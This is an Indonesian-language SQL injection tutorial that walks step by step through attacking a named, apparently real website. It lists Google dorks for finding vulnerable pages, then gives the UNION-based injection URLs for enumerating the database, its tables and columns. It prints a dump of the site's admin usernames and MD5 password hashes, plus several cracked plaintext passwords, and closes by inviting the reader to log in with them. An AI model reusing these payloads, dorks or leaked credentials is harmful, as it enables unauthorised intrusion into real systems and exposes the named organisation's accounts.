Anda di halaman 1dari 16

RobertSinaga Articel SQLinjection

SqLi Tutorial Sql Injection Tutorial Sql Injection Artikel SQL Injection Article Sqli (alias Sql Injection atau Structured Query Language Injeksi) adalah langkah pertama dalam entri untuk memanfaatkan atau hacking website. Hal ini mudah dilakukan dan merupakan titik dari awal yang bagus. Sayangnya tutorial yang sedikit rumit sehingga itulah sebabnya ane menulis ini. Sqli pada dasarnya hanyalah suntikan pertanyaan ke dalam database atau menggunakan query untuk mendapatkan bypass otorisasi sebagai sebuah admin.

Untuk Mencari Inject Mencari SQLI sangat mudah,semua yang perlu ente2 lakukan adalah Googling . Hal pertama yang perlu ente2 lakukan adalah menemukan beberapa dorks Code: inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id=

inurl:newsitem.php?num= inurl:readnews.php?id= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:read.php?id= "id=" & intext:"Warning: mysql_fetch_assoc() "id=" & intext:"Warning: mysql_fetch_array() "id=" & intext:"Warning: mysql_num_rows() Lebih lengkap, silakan dicari di Google Dorknya

Disini saya akan memberikan contoh dengan web Pemerintah, setelah saya cari di google dork dengan key inurl:news.php?id= Situsnya adalah http://www.aims-indonesia.org/common/news.php?id=8 Berikut langkah SQLinject nya

http://www.aims-indonesia.org/common/news.php?id=8

Sekarang kita akan melakukan pengecekan apakah website tersebut memiliki vulnerability dengan menambahkan tanda di akhir URL, contohnya sebagai berikut: Code:

http://www.aims-indonesia.org/common/news.php?id=8

Jika kita menemukan error, maka terdapat vulnerability di website tersebut, sebagai contoh:

Setelah kita mengetahui ada vulnerability, maka langkah selanjutkan adalah kita harus mengetahui berapa jumlah kolom yang ada di table tersebut Kita akan mengetahuinya sampai ada informasi Unknown Column. Lakukan pengecekan dengan menggunakan perintah order by. Kita akan mencoba dari 1..tak hingga, jadi bisa saja 1,2,3,4,5,6,7,dst. Kebetulah dalam target ini hanya terdapat 11 kolom dalam table yang ada di database,

Contohnya:

Langkah pengetesannya adalah Code:


http://www.aims-indonesia.org/common/news.php?id=8order http://www.aims-indonesia.org/common/news.php?id=8order http://www.aims-indonesia.org/common/news.php?id=8order http://www.aims-indonesia.org/common/news.php?id=8order http://www.aims-indonesia.org/common/news.php?id=8order http://www.aims-indonesia.org/common/news.php?id=8order http://www.aims-indonesia.org/common/news.php?id=8order http://www.aims-indonesia.org/common/news.php?id=8order http://www.aims-indonesia.org/common/news.php?id=8order http://www.aims-indonesia.org/common/news.php?id=8order http://www.aims-indonesia.org/common/news.php?id=8order by by by by by by by by by by by 1-- >> no error 2-- >> no error 3-- >> no error 4-- >> no error 5-- >> no error 6-- >> no error 7-- >> no error 8-- >> no error 9-- >> no error 10-- >> no error 11-- >> no error

http://www.aims-indonesia.org/common/news.php?id=8 order by 12-- >> Unknown column

http://www.aims-indonesia.org/common/news.php?id=8order by 12-- *>> Unknown column Hal tersebut membuktikan bahwa tidak ada kolom ke 12 dalam table tersebut, jadi cuman ada 11 kolom.

Langkah selanjutnya adalah, mencari kolom yang dapat di akses! Kita sudah mengetahui, jumlah kolom adalah 11, kita gunakan perintah UNION SELECT number,of,columns untuk mengatahui kolom mana yang dapat di akses: Code:
http://www.aims-indonesia.org/common/news.php?id=8 union select 1,2,3,4,5,6,7,8,9,10,11--

Anda akan menemukan seperti gambar berikut:

Muncul 4 kan? Kolom dalam tersebutlah yang bisa anda akses dan anda ambil informasinya.

Langkah selanjutnya, mencari informasi versi database SQL Injection bekerja baik pada versi 5.* ke atas, untuk mendapatkan informasi database version, kita masukkan saja @@version, pada kolom dimana saja yang bisa dipakai. Misalkan kolom 4 kita ganti dengan @@version

Code:
http://www.aims-indonesia.org/common/news.php?id=8 union select 1,2,3,@@version,5,6,7,8,9,10,11--

Akan muncul versi database 5.0.77, ini berarti database bisa di inject

Mengetahui Database Name Langsung ajah kita replace kolom yang tadi digunakan 4 dibagian mana saja, kita gunakan kolom 4, kita ganti dengan code berikut group_concat(schema_name) , dan jangan lupa tambahkan from information_schema.schemata-- sesudah kolom terakhir. Code:
http://www.aims-indonesia.org/common/news.php?id=8 union select 1,2,3, group_concat(schema_name),5,6,7,8,9,10,11 from information_schema.schemata-

Mengatahui Database Yang Dipakai Langsung ajah ganti group_concat(schema_name) dengan concat(database()) seperti contoh berikut: Code:
http://www.aims-indonesia.org/common/news.php?id=8 union select 1,2,3, concat(database()),5,6,7,8,9,10,11 from information_schema.schemata--

Selamat, anda telah mengetahui database yang dipakai saat ini adalah new_prod.

Mengetahui Nama Tabel Langsung aja ganti group_concat(table_name) dan tambahkan from information_schema.tables where table_schema=database()-- setelah kolom terakhir. Code:
http://www.aims-indonesia.org/common/news.php?id=8 union select 1,2,3, group_concat(table_name),5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--

Nama tabel yang mengandung admin info adalah adm_user.

Mengatahui Nama Kolom Untuk mengetahui nama kolom, kita gunakan query berikut: group_concat(column_name) from information_schema.columns where table_schema=database()-Code:
http://www.aims-indonesia.org/common/news.php?id=8 union select 1,2,3, group_concat(column_name),5,6,7,8,9,10,11 from information_schema.columns where table_schema=database()--

Biasanya dalam langkah ini, qta akan menemukan kolom username dan pasword seperti di bawah ini

Mengambil Informasi Yang Ada Di Dalam Kolom Ini adalah step akhir, dimana anda akan mendapatkan informasi mengenai isi dari kolom yang berada dalam table di database. Eksekusi perintah berikut: Code:
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columnusername,0x3a,columnpassword),7 from currentdb.tableused #inilah rumus SQLinjection #kadang ini tidak berguna jika web sudah di hack, ini hanya contoh.. mohon di pahami n kembang kan...

Exploit akan menjadi seperti berikut : Code:


http://www.aims-indonesia.org/common/news.php?id=8 union select 1,2,3, group_concat(username,0x3a,password),5,6,7,8,9,10,11 from new_prod.adm_user-catatan= new_prod : database name adm_user : Tabel name

Inilah daftar admin dan password ny admin:103f1251f59c3b66c741543e237082ab,renbang:bc515bf7839adafcf0772af63de956 9f,ppp:5a9ec3578af700da86d1bed843ecfdba,multi:5f637f774f8861f37fa26540cdb241fa,b ila:177826b3d748ab6ac46d226326779a3d,alokasi:ae452cd362de2ac6e09536390ec2f292,b appenas:9ecab8c88388b2cf7ddbd5f2b123e4cb,bappenas1:229204bf45d906c088f3437fb4 edd989,ausy1:4bb2db4f6fe45811496b30db6d7db09a,idtrain1dp:aac779a5d703c1c224db 3d46bcf9b161,idtrain2dp:ba702756c40dcb68964354029a169b78,idtrain3dp:be43cc4da1 c9a9633cf7a6a0746960df,idtrain4dp:fab8f67331f3fc4279bab8c70d4e86a1,idtrain5dp:a8 b8cec0cf9e7db591bbf5f9d3c163e9,idtrain6dp:d98199aa286a703582d08ef850c46f4e,idtra in7dp:20272362fb4656cc8d0aec94b4d73a2b,idtrain8dp:91de38ae1133dcba27889b60940 512fe,idtrain9dp:6833037291930cea1ab499ea71340688,idtrain10dp:2c516d288d819e0fa 6261880870591f3,idtrain1kl:a677886a3832a3efe66248daf87088b0,idtrain2kl:d14c52fecc 4cf04439419834560e0e29,idtrain3kl:00f659fbda76b1177a86d9b62d2d3ee8,idtrain4kl:57 20a2e82281cff019b70a245e1305be,idtrain5kl:1e0048f3b988d9ea403963779939c85f,idtr

Dari informasi di atas kita mendapatkan data: comaster:2c39e3769d300f7e23f8a9e1e21773e7 , Silakan check ke MD5 decrypter untuk mendecrypt password -> http://www.md5decrypter.co.uk/ paste MD5 password yang tadi yaitu: bc515bf7839adafcf0772af63de9569f , anda akan medapatkan result seperti dibawah:

renbang:bc515bf7839adafcf0772af63de9569f renbang:renbang123 username : renbang password : renbang123

ppp:5a9ec3578af700da86d1bed843ecfdba ppp:ppp123

username:ppp password:ppp123

bappenas: 9ecab8c88388b2cf7ddbd5f2b123e4cb bappenas:bapenas123

username:bappenas password:bapenas123

Selamat, anda sudah bisa login ke page dengan user & password di atas Credit: Robert Sinaga

Anda mungkin juga menyukai